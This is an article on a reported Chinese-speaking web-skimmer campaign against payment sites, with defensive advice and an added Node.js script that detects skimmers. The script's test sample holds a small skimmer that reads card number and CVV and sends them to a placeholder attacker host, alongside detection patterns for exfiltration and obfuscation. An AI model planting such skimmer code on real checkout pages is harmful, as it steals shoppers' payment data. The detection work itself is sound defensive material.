
The Growing Threat: Chinese Hackers Extend Web Skimmer Campaign to North American and APAC Firms


Cybercrime: Chinese Hackers Target North American, APAC Firms in Web Skimmer Campaign

A threat actor that BlackBerry assesses to be Chinese-speaking has been running a widespread and well-resourced campaign against online payment businesses using web skimmers. The campaign, dubbed “Silent Skimmer,” initially focused on organizations in the APAC region but has since expanded to businesses in Canada and the United States. The attackers appear experienced and resourceful, continually adjusting their infrastructure to avoid detection as they move into new territories.

Method of Attack

The campaign has targeted multiple industries that host or build payment infrastructure, including online merchants and point-of-sale providers. The attackers exploit vulnerabilities in internet-facing applications to gain initial access, then deploy a range of tools to escalate privileges, execute code, and establish remote access.

The attackers host all of their tools and post-exploitation payloads on an HTTP File Server (HFS) running on a temporary virtual private server (VPS); the VPS is placed in a region matching the victim’s location so that traffic to it looks less anomalous. For remote code execution on targeted servers, the threat actor exploits a .NET deserialization vulnerability in Progress Telerik UI for ASP.NET AJAX. Successful exploitation lets the attackers drop a remote access tool (RAT) written as a PowerShell script, which gives them control over the compromised systems.

The RAT lets the attackers gather system information, upload and download files, search for files, connect to a database, and more. The same server that hosts the RAT also holds downloader scripts, remote access scripts, webshells, exploits, and Cobalt Strike beacons.

The Goal: Harvesting User Information

The ultimate aim of the campaign is to place a web skimmer on the payment checkout pages of targeted organizations. A web skimmer is malicious JavaScript injected into a site’s checkout page: it reads what the customer types into the payment form (billing details, card number, expiry date, security code) and sends a copy to attacker-controlled infrastructure without interfering with the legitimate transaction. In this campaign the harvested data is exfiltrated through Cloudflare, a popular content delivery network, which helps the outbound traffic blend in with ordinary CDN traffic.
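As an added example (this is not code from the article or from BlackBerry’s report), the following Node.js script shows a heuristic check a site owner could run against a fetched copy of their own checkout page to spot an injected skimmer of the kind described above: it flags external scripts whose host is not on an allowlist, and inline scripts that both read payment fields and ship data off the page, contact a foreign host, or carry common obfuscation markers. The site name shop.example, the allowlisted host js.payments.example, the two attacker hosts, and both HTML samples are constructed for the example.

```javascript
// Added example: heuristic detection of a web skimmer on a checkout page.
// Not code from the article or from BlackBerry's report. All hostnames and
// both HTML samples below are constructed for this example.

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;
// Field names a skimmer typically looks for on a checkout form.
const PAYMENT_FIELD_RE = /\b(card[-_ ]?number|cc[-_]?num|cvv|cvc|expir|exp[-_]?(month|year|date)|cardholder|billing)\b/i;
// Ways inline code can move data off the page (beacons, image pixels, sockets).
const EXFIL_RE = /\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image|WebSocket)\b|\.src\s*=/;
// Markers of the obfuscation skimmers commonly use (decoders, long \x escapes).
const OBFUSCATION_RE = /\b(atob|eval|unescape|String\.fromCharCode)\b|(?:\\x[0-9a-f]{2}){8,}/i;
// Absolute URLs embedded in script text.
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Resolve a src or URL against the site origin; null if it cannot be parsed.
function hostOf(url, siteHost) {
  try {
    return new URL(url, 'https://' + siteHost + '/').hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Scan one page. Returns a list of {script, kind, detail} findings. An empty
// list means nothing matched the heuristics, not that the page is clean.
function scanCheckoutPage(html, siteHost, allowedScriptHosts) {
  const allowed = new Set([siteHost, ...allowedScriptHosts].map((h) => h.toLowerCase()));
  const findings = [];
  let index = 0;
  for (const m of html.matchAll(SCRIPT_RE)) {
    index += 1;
    const attrs = m[1];
    const body = m[2];
    const src = attrs.match(SRC_RE);
    if (src) {
      // External script: only the host matters here.
      const host = hostOf(src[1], siteHost);
      if (host && !allowed.has(host)) {
        findings.push({ script: index, kind: 'external-script-not-allowlisted', detail: host });
      }
      continue;
    }
    // Inline script: look at what it touches and where it talks to.
    const reasons = [];
    if (PAYMENT_FIELD_RE.test(body) && EXFIL_RE.test(body)) {
      reasons.push('reads-payment-fields-and-exfiltrates');
    }
    if (OBFUSCATION_RE.test(body)) {
      reasons.push('obfuscation');
    }
    const foreign = new Set();
    for (const u of body.matchAll(URL_RE)) {
      const host = u[1].toLowerCase();
      if (!allowed.has(host)) foreign.add(host);
    }
    if (foreign.size > 0) reasons.push('contacts:' + [...foreign].join(','));
    if (reasons.length > 0) {
      findings.push({ script: index, kind: 'suspicious-inline-script', detail: reasons.join(';') });
    }
  }
  return findings;
}

// Constructed sample: a benign checkout page. The inline helper touches the
// card field but sends nothing, so it must not be flagged.
const CLEAN_PAGE = `
<html><body>
<form id="checkout">
  <input id="card-number" name="cardNumber">
  <input id="cvv" name="cvv">
</form>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example/v1/"></script>
<script>
  // first-party formatting helper: touches card fields but sends nothing
  document.getElementById('card-number').addEventListener('input', function (e) {
    e.target.value = e.target.value.replace(/\\s+/g, '').replace(/(.{4})/g, '$1 ').trim();
  });
</script>
</body></html>`;

// Constructed sample: the same page with an unexpected third-party script and
// an inline skimmer that reads the card fields on submit and leaks them via an
// image request to an attacker host.
const SKIMMED_PAGE = `
<html><body>
<form id="checkout">
  <input id="card-number" name="cardNumber">
  <input id="cvv" name="cvv">
</form>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example/v1/"></script>
<script src="//static-cdn-assets.example/jquery.min.js"></script>
<script>
  document.querySelector('form#checkout').addEventListener('submit', function () {
    var d = { n: document.getElementById('card-number').value,
              c: document.getElementById('cvv').value };
    var i = new Image();
    i.src = 'https://cdn-static-assets.example/collect?d=' + btoa(JSON.stringify(d));
  });
</script>
</body></html>`;

const SITE = 'shop.example';
const ALLOWED = ['js.payments.example'];

for (const [label, page] of [['clean', CLEAN_PAGE], ['skimmed', SKIMMED_PAGE]]) {
  console.log(label + ':', JSON.stringify(scanCheckoutPage(page, SITE, ALLOWED)));
}
```

Run it with node; it prints no findings for the clean page and two for the skimmed one (the unexpected script host and the inline skimmer). A check like this complements, rather than replaces, a Content-Security-Policy that restricts script-src, connect-src and img-src to known hosts: a skimmer served from an allowlisted host, or one that uses a channel the heuristics do not cover, will still go unnoticed, which is why the checkout page should also be diffed against a known-good copy on a schedule.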

According to BlackBerry, the threat actor mainly targets regional websites that collect payment data, and the attacks appear to be opportunistic rather than industry-specific. The threat actor’s identity remains unknown, but the PowerShell RAT’s code contains simplified Chinese text, and the attacker’s command-and-control server is hosted in Asia, specifically Japan. Together these factors suggest a Chinese-speaking actor operating in Asia.

The Importance of Internet Security

This campaign highlights why internet-facing systems that collect and process payment data need disciplined patch management: the initial access described above came from exploiting a known vulnerability in a widely used web component. Organizations should inventory third-party components such as Telerik UI for ASP.NET AJAX, patch them promptly, and treat an internet-facing server that cannot be patched as a candidate for isolation. Strong access controls, network segmentation, and monitoring then limit what an attacker can do after a successful exploit; in particular, restricting outbound connections from web servers makes it harder for a PowerShell downloader to fetch tools from an attacker’s file server.

Intrusion detection and prevention systems should be tuned to flag the activity seen in this campaign, such as requests that exploit known deserialization flaws and PowerShell processes downloading from unfamiliar hosts. Because the skimmer itself runs in customers’ browsers, the checkout page should also be monitored for unexpected script changes. Educating employees about phishing and other social engineering techniques remains worthwhile, even though this campaign gained access by exploitation rather than by tricking staff.

Editorial: The Growing Threat of Cybercrime

This targeted campaign by Chinese hackers is indicative of the escalating threat of cybercrime globally. As more businesses and individuals rely on online payment systems, the potential monetary gain for hackers increases. This case demonstrates the importance of international cooperation and information sharing to combat cybercriminals effectively.

Nations need to work together to establish clear guidelines and regulations for cybersecurity, particularly concerning cross-border attacks. This should include sharing threat intelligence and collaborating on investigations to identify and apprehend cybercriminals.

Furthermore, organizations must prioritize cybersecurity in their budgets and allocate resources to ensure their systems are secure. Investment in advanced cybersecurity technologies and training for employees can help mitigate the risk of cyberattacks and protect sensitive customer data.

Conclusion

The Silent Skimmer campaign conducted by Chinese hackers poses a significant threat to online payment businesses across North America and the APAC region. With sophisticated attack techniques and the ability to continually adapt their infrastructure, these hackers have proven to be resourceful and persistent.

To protect against such attacks, organizations must prioritize internet security and take proactive steps to secure their systems and educate employees about potential threats. Additionally, international collaboration and information sharing are crucial in the fight against cybercrime.
